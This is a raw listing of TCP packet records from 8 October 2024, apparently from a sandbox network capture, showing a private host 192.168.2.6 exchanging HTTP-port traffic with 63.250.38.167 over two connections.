Oct 8, 2024 11:31:06.488799095 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488815069 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488831997 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488859892 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488881111 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488889933 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488905907 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488924980 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488957882 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.488974094 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.488992929 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.489026070 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.489042997 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.489058971 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.489094973 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.489109039 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.489123106 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.489156961 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.489187956 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.489192009 CEST	80	49991	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:06.489197016 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:06.489236116 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:09.949451923 CEST	49991	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:12.571166039 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:12.576288939 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:12.576371908 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:12.576649904 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:12.581532955 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.272907019 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.272973061 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273006916 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273025036 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273045063 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273077965 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273091078 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.273113012 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273142099 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.273150921 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273195982 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273200035 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.273230076 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273269892 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.273269892 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.278301954 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.278337955 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.278361082 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.325465918 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.336671114 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.336721897 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.336757898 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.336777925 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.336790085 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.336838007 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.341420889 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.341456890 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.341531992 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.341607094 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.341640949 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.341691971 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.346225977 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.346262932 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.346321106 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.346355915 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.346389055 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.346486092 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.346486092 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.350996971 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.351032972 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.351068020 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.351073027 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.351104975 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.351121902 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.355880022 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.355916023 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.355948925 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.355948925 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.355984926 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.356002092 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.360620975 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.360656023 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.360691071 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.360696077 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.360738993 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.422360897 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.422415972 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.422450066 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.422477007 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.422483921 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.422533989 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.427012920 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.429434061 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.429454088 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.429470062 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.429486990 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.429577112 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.434282064 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.434300900 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.434315920 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.434330940 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.434355974 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.434390068 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.439042091 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.439062119 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.439076900 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.439093113 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.439117908 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.439143896 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.443934917 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.443955898 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.443970919 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.443986893 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.444000959 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.444027901 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.444072962 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.448692083 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.448707104 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.448724031 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.448740005 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.448751926 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.448803902 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.453660965 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.453685999 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.453706026 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.453726053 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.453739882 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.453752995 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.453777075 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.453824043 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.458519936 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.458555937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.458590984 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.458611012 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.458626032 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.458677053 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.463257074 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.463293076 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.463346004 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.512660980 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.512685061 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.512712002 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.512727976 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.512744904 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.512753010 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.512761116 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.512778997 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.512824059 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.512842894 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.513608932 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.513624907 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.513642073 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.513657093 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.513673067 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.513705969 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.519900084 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.519954920 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.519954920 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.519972086 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.520023108 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.520031929 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.520049095 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.520092010 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.520452023 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.520514011 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.520529985 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.520545006 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.520576000 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.520606041 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.521083117 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521099091 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521122932 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521137953 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521138906 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.521153927 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521193981 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.521872997 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521888971 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521905899 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521918058 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.521945000 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.521945953 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.521962881 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.522008896 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.522768021 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.522783995 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.522800922 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.522819996 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.522835970 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.522861004 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.522896051 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.523731947 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.523786068 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.523825884 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.523842096 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.523857117 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.523864985 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.523907900 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.524679899 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.524705887 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.524722099 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.524738073 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.524751902 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.524754047 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.524781942 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.525409937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.525470018 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.525521040 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.525738955 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.525881052 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.525933027 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.526083946 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.526110888 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.526127100 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.526128054 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.526144028 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.526166916 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.526892900 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.526984930 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.527034998 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604003906 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604049921 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604065895 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604089022 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604115009 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604131937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604129076 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604151011 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604168892 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604171038 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604182959 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604193926 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604213953 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604219913 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604233980 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604253054 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604262114 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604305983 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604321957 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604336977 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604351044 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604366064 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604386091 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604396105 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604401112 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604418993 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604420900 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604433060 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.604445934 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.604476929 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.610831976 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.610848904 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.610863924 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.610909939 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.610955000 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.610970974 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.610986948 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611008883 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611032963 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611037016 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.611048937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611063004 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.611068964 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611084938 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.611093044 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611109972 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611116886 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.611124992 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611135006 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611155987 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611166954 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.611171961 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611188889 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611216068 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.611216068 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.611921072 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611936092 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611951113 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.611979961 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612006903 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612018108 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612034082 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612051010 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612076044 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612080097 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612091064 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612114906 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612126112 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612131119 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612149000 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612160921 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612164021 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612180948 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612195015 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612236977 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612814903 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612828016 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612873077 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.612906933 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612931013 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612945080 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.612984896 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.613018990 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613034010 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613050938 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613074064 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613078117 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.613090038 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613090992 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.613105059 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613121033 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613136053 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613146067 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.613152981 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613169909 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.613200903 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.613845110 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613861084 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613884926 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613899946 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613914013 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.613914967 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.613965034 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.614033937 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614048958 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614064932 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614088058 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.614089012 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614109993 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614115000 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.614125967 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614149094 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614166021 CEST	80	49993	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:13.614170074 CEST	49993	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:13.614181995 CEST	80	49993	63.250.38.167	192.168.2.6
